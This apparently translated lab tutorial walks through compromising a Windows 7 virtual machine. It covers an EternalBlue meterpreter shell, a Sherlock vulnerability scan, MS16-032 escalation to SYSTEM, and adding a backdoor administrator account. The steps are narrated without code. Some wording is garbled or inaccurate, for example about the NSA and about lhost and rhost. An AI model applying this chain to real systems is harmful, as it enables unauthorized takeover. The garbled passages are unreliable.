Windows Privilege Escalation with Sherlock
In this article, the privilege escalation will be performed on Kali Linux and Windows 7, which is already installed on a virtual machine. VMware Workstation was preferred as the virtual machine. It will be assumed that basic terminal commands are known and setups are made throughout the lecture.
What is Privilege Escalation ?
As we know, the main purpose in penetration test studies is to be the most authorized user. If we accessed the system with most authoritative user in a word system administrator, or the application or service that includes the vulnerability that allows us to system works administrator rights, there is no problem. However, if the service or system we want to infiltrate has low rights from the system administrator or works with a user account with lower rights, we need to follow a number of methods so that we can have the system administrator rights. This includes recovering a system in a dangerous situation. As we can understand from here, the main purpose in privilege escalation is to access data that ordinary users cannot access.
There are many privilege escalation methods. Some of them are:
- Sherlock
- JAWS — Just Another Windows (Enum) Script
- Windows Privesc Check (WPC-PS)
- PowerUp
- BeRoot
- DLL Injection
- Token Manipulation
- SessionGopher
- Windows Kernel Exploit
- DLL Hijacking …
In this article, Sherlock method will be explained practically.
What is Sherlock ?
Sherlock is a Powershell script used to privilege escalation, quickly finding vulnerabilities in the system. Vulnerability scanning is done through Kali Linux and the required codes are run with Powershell on Windows system.
Downloading the Sherlock module
First, we download our Sherlock file from Kali Linux terminal.
Learning the IP address of Windows system
In order to access the openings in Kali Linux and Windows 7 system, the network settings of these two operating systems must be the same on our virtual machine. You can set the network setting for both systems as NAT or Custom VMnet from “Network Adapter” in the “Settings” option of the operating systems we install in our virtual machine. In this narrative, NAT is used for both systems as the network setting.
Since both operating systems are set up on the same network, we can easily learn the IP address of the Windows system on Kali Linux via the terminal.
nbtscan is a tool that comes installed with Kali Linux, by requesting the nbt protocols of the computers on the network and determining whether they are alive or not.
With the nbtscan command, we can see that the IP address of Windows system is “192.168.119.132”.
Get meterpreter shell on Windows system
As a next step, we need to get the meterpreter shell from the Windows system.
Shell is an interface where users use the operating system, enter commands, and transmit these commands to the operating system. Meterpreter is a tool written for Metasploit Framework that facilitates penetration tests.
First of all, we are launching the Metasploit Framework.
Then we list the list of eternalblue exploits. If we talk briefly about Eternalblue, it is a cyber attack exception developed by the Malware National Security Agency (NSA) and leaked by Shadow Brokers in April 2017.
We select the draft module we will use from the “Name” section listed on the left.
Now we need to enter a payload to get the meterpreter session. Briefly, payload is the code or software snippets we send to exploit the vulnerability to be abused.
As a last step, we enter the IP addresses of the Windows 7 machine and Kali Linux machine as parameters, whose vulnerabilities we want to see.
We enter the IP address of the system we attack as lhost and the victim IP address as rhost.
And exploit…
After seeing the WIN warning, the meterpreter shell command line appears successfully.
Listing vulnerabilities with Powershell
As mentioned first, Sherlock is a Powershell script that scans vulnerability in Windows systems for privilege escalation. Therefore, Powershell commands will be run.
First of all, we load Powershell from the terminal.
We import the Sherlock.ps1 file in the Sherlock folder that we downloaded previously by giving the path we downloaded the file.
Now we can list the vulnerabilities in the Windows system.
We see that the names of the vulnerabilities, the dates they were found, the links containing the information about these vulnerabilities, and whether the vulnerabilities are supported according to whether they are 64-bit or 32-bit are listed.
VulnStatus may not be successful in every vulnerability that is Appears Vulnerable. Being successful even one of them is enough to create an authorized user in the system.
We can use the MS16–032 and MS16–135 vulnerabilities of the Appears Vulnerable ones.
In order to use MS16–032 vulnerability, we go to the address given as Link and save the codes in the notebook with the name ms16–032.ps1. Then we copy this saved file to the Windows desktop.
Implementation of vulnerabilities in Windows system
On the Windows system, we can see our username and the domain we belong to, if available. Here we see the unauthorized user belonging to the domain I created with my own name.
We bypass Powershell with execution policy.
We import and run the ms16–032.ps1 file that we copied to the Windows desktop.
Before the import process, while our user was an unauthorized domain user, after the import process, the system administrator right was reached as nt authority/system.
After this step, we can now create an authorized user and add it to the administrator group.
First, we create a user named Yetkili and set his password as we want, and then we add this user to the administrator group.
We can create an authorized user in the same way by following the steps we followed in MS16–032 vulnerability in MS16–135 vulnerability.
Result
As a result, we created an authorized user on a Windows system signed in with an unauthorized user and made an application to prevent possible dangers or data loss. Thanks for reading this article ! See you in next applications.
